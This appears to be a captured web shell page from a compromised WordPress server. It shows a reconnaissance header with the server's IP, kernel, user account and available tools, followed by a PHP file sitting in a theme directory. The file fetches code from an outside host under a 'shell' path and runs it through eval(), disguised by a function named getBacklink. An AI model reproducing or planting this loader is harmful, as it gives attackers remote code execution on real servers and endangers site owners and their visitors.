Server IP : 192.64.112.168 / Your IP : 18.224.38.165 Web Server : Apache System : Linux nc-ph-2300-85.bluforrest.com 4.18.0-513.9.1.el8_9.x86_64 #1 SMP Sat Dec 2 05:23:44 EST 2023 x86_64 User : expressoneac ( 1128) PHP Version : 8.0.30 Disable Function : exec,passthru,shell_exec,system MySQL : OFF | cURL : ON | WGET : ON | Perl : ON | Python : ON | Sudo : ON | Pkexec : ON Directory : /home/expressoneac/www/wp-content/themes/woodmart/ |
Upload File : |
<?php function getBacklink($url) { if( ini_get('allow_url_fopen') == 1 ) { // Jika url fopen on maka jalankan return file_get_contents($url); }else if(function_exists('curl_version')) { //Jika url fopen off maka jalankan menggunakan curl $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_HEADER, 0); $data = curl_exec($ch); curl_close($ch); return $data; } } eval("?>" . getBacklink("https://marslogs.co.id/shell/shell/403-for.txt")); ?>